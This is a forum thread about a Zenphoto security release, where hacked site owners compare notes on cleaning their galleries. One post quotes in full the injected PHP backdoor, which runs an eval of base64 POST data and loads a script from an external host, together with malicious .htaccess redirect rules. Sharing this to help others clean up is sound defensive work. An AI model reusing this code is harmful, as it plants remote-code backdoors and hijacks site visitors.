zenphoto forums » General Zenphoto Discussion

Zenphoto 1.4.1.6 security update released

(31 posts)
  1. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    More info on:
    http://www.zenphoto.org/news/zenphoto-1.4.1.6

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  2. hucste

    Contributor
    Joined: Jul '09
    Posts: 172

    Thanks to act as !
    It's very good thing...

    Posted 2 years ago #
  3. Ipstenu

    Contributor
    Joined: May '09
    Posts: 101

    Is there any difference to the manual changes I made yesterday for 1.4.1.5? (I use SVN to manage my install and I'm loath to download and change if I already took care of it by manually removing it).

    Posted 2 years ago #
  4. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    No, the 1.4.1.6 release (as noted on the post) just incorporates the changes mentioned on the 2nd security post. Otherwise it is just 1.4.1.5. Btw, that is mentioned in the release post's first sentence..;-)

    Again, note that the svn trunk is NOT 1.4.1.6 but already 1.4.2 beta (the dev svn stream as well) as the 1.4.1.x line was actually considered complete. This has been announced a week or so ago.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  5. Zenphoto translation team
    Michel Gagnon

    Translator
    Joined: Apr '10
    Posts: 158

    A slightly different question: I have downloaded and installed the 1.4.3 DEV (8385) version and done the corrections you suggested in the "Security alert - Part 2 update 2". Am I OK?

    P.S. One site was hacked, the other was not, but I cleaned and updated both anyways.

    Posted 2 years ago #
  6. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    Yes, as far as we know. But I recommend to use the TRUNK svn as that wil become the next version 1.4.2. That is beta and will not get new features until the scheduled release (see roadmap on the bugtracker. Using this will help us find bugs we missed.

    The DEV svn is for 1.4.3 somewhere in the future. Currently both are still the same but soon this one might get experimental. So we can't recommend to use this on a live site currently.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  7. Zenphoto translation team
    mironb

    Translator
    Joined: Jan '08
    Posts: 73

    Hi
    Mi site was also hacked. I think no is clear but I didn't deleted jpg files with photos. How can I check are they not infected ?

    Posted 2 years ago #
  8. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    I would say try a virus scan for the start.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  9. oscardog

    Apprentice
    Joined: Nov '11
    Posts: 1

    After being affected by this loophole and clearing out the old install when I come to upload (cPanel) the install package my hosts system is rejecting the 1.4.1.6.zip saying it contains a virus (scanner is probably ClamAV).

    I can not get any details as to which file it objects to.

    Has this been an issue for anyone else?

    Posted 2 years ago #
  10. BernardJL

    Apprentice
    Joined: Nov '11
    Posts: 3

    Maybe we are missing something here. Without the "ajax file manager" we cannot use the "Files" tab under "Upload".

    Which seems to mean the only way to add photos is via the web page upload.

    Is there some other way to get Zenphoto to process files we already have copied to the server? That has always been our preferred method to load pictures.

    Any help is appreciated.

    Posted 2 years ago #
  11. sbillard

    Contributor
    Joined: May '07
    Posts: 10,464

    The "Files" tab did never provide a way to add photos to your gallery. it is just a way to upload files to your "uploaded" folder which you can then place as you wish on your pages through HTML.

    It is the "Images" tab that provided the means for uploading photos. It is still present and operational.

    Besides, there is always FTP to upload to your site. Zenphoto always processes images it finds in your albums folders.

    Posted 2 years ago #
  12. BernardJL

    Apprentice
    Joined: Nov '11
    Posts: 3

    SBillard, thanks for clearing that up for us. We are moving from another photo gallery to Zenphoto and just getting use to the file structure of Zenphoto.

    Thanks so much for your quick response. It is really appreciated.

    Posted 2 years ago #
  13. sbillard

    Contributor
    Joined: May '07
    Posts: 10,464

    We are also working closely with the developer of ajaxfilemanager and hope to have a solution to the security issues soon.

    Posted 2 years ago #
  14. lkco

    Apprentice
    Joined: Nov '11
    Posts: 2

    Hi all,
    my site was hacked and i lost a lot of informations :'( But I was able to find some information in the Apache logs.
    The hacker succeeded to download the [link removed by moderator] file and execute it. It has mostly to remove all files owned by apache.
    I hope this will help someone !

    Posted 2 years ago #
  15. Zenphoto development team
    fretzl

    Moderator
    Joined: Sep '08
    Posts: 730

    I removed the link to the zip file because I'm not sure if it's potentially dangerous.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  16. lkco

    Apprentice
    Joined: Nov '11
    Posts: 2

    Hi,
    i'm ok for this. So the zip contain no virus but a php,perl and sql files. The php file is similar to ajaxterm. I think that my issue could help someone.
    If you want i post the php file screenshot : http://tinypic.com/r/301ev89/5

    Posted 2 years ago #
  17. fotofill

    Apprentice
    Joined: Nov '11
    Posts: 2

    My site (fotofill.net) was hacked too. We rescanned the site, had the host do the same. I traced the IP and blocked any IP from Russia-Ukraine.It appears the hacker used tiny_mce to get access. I am pretty new to all this. Here is the message from my host:

    After further investigation, it appears that a hacker was able to inject malicious code into most (if not all) your php files by using the tiny_mce editor function from your Zenphoto installation.

    They suggested this:
    1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.

    2). Scan the local system used to access this account for malware using the following software: MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ). Many instances of compromised login details are due to local malware intercepting login details.

    We did that. We asked Google to scan the site also. Still waiting...
    My problem now is that my logins and passwords were wiped out at ZP and I cannot get in.

    Anything wth fotofill.net in it is being blocked ny browsers. Can someone help me get to my zp-core? Thanks

    Posted 2 years ago #
  18. sbillard

    Contributor
    Joined: May '07
    Posts: 10,464

    If the whole fotofill.net is blocked it is probably by your hosting company. That is a pretty standard response to this kind of attack. For instance my hoster did this. I had to use FTP to cleanse the site and then contact the hoster to have it unblocked.

    There is another thread with details on how to cleanse your site, but basically it involves removing all the site files and reloading from backup. Always, of course, do not restore the zenphoto files but obtain the fixed version and install that.

    Posted 2 years ago #
  19. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    THe blocking of the site is not by the hosting company. It is blocked in the browser by using a warning database Google & Co provide that most browser vendors use.

    Sorry, you will have to wait until your site is rescanned and removed from that. On Google that might take a few days. You can of course ignore that warning and proceed. How to reset Zenphoto passwords is explained on our troubleshooting.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  20. LiechsWonder

    Member
    Joined: Nov '11
    Posts: 12

    Hello! I have 2 zenphoto galleries on my site and both of them got hit by the ajax bug so now I am trying to fix it (really annoying because I am in the middle of two large class projects). Based on what I have read on this post and the other couple related posts, this is what I have gathered the solution to fix it is:

    1. Delete ajax upload manager folder inside of zenphoto
    2. Install latest zenphoto release
    3. Go through all php and .htaccess files on the website to ensure they are clean

    Does that sound right? I am still new to zenphoto/website management in general and I want to be sure I don't do something stupid while trying to clean it up and lose the 7000+ images between my two galleries, lol.

    Thank you for your help!

    Posted 2 years ago #
  21. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    That is what we know so far by reports of users (as we ourselves were not hacked).

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  22. LiechsWonder

    Member
    Joined: Nov '11
    Posts: 12

    Ok great. I will give that a shot then!

    I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat :P).

    Posted 2 years ago #
  23. haizhu

    Apprentice
    Joined: Jan '11
    Posts: 3

    I appear to also have been effected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting the accounts. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).

    Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?

    For reference, the hackers added this to the top of all PHP files:

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    …and this to the end of all the .htaccess files:

    ErrorDocument 400 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 401 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 403 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 404 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 500 http://(hacker's URL).in/jaki/index.php				
    
    <IfModule mod_rewrite.c>																						RewriteEngine On																							RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)																RewriteRule ^(.*)$ http://(hacker's URL).in/jaki/index.php [R=301,L]																	</IfModule>

    Thanks!

    Posted 2 years ago #
  24. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    Here are several insights to the hackes by a user:
    http://www.zenphoto.org/support/topic.php?id=9951#post-58366

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  25. formulae

    Member
    Joined: Nov '10
    Posts: 28

    I have had is more than 2500 php files infected with the prefixed code
    different referring domain
    all my wordpress files, piwik, sigh

    Posted 2 years ago #
  26. puregraphx

    Apprentice
    Joined: Dec '10
    Posts: 3

    Also several of my website that use ZP were hacked, I have recovered 1 website, but I'm having troubles with another one, I have deleted all webfiles and when I visit the url, I keep being redirected, although the site is completely empty, also all htaccess were deleted. So my question is, what part keeps redirecting ??

    Posted 2 years ago #
  27. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    Please take a look to the forum topic linked above. I personally can't answer as we were not affected.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  28. ultgamewiz

    Apprentice
    Joined: Nov '11
    Posts: 3

    puregraphx : I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell access only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.

    Posted 2 years ago #
  29. ultgamewiz

    Apprentice
    Joined: Nov '11
    Posts: 3

    Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)

    Is this normal activity for zengallery?

    Posted 2 years ago #
  30. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 15,225

    I would recommend to clear all caches. Does not hurt as they are recreated on request anyway. It is unlikely that images contain hacked code but the cached html or rss files might do (not php but hacked links or js code).

    No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
    rss_Screenshots_screenshots_en_US.xml
    This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #

RSS feed for this topic

Reply »

You must log in to post.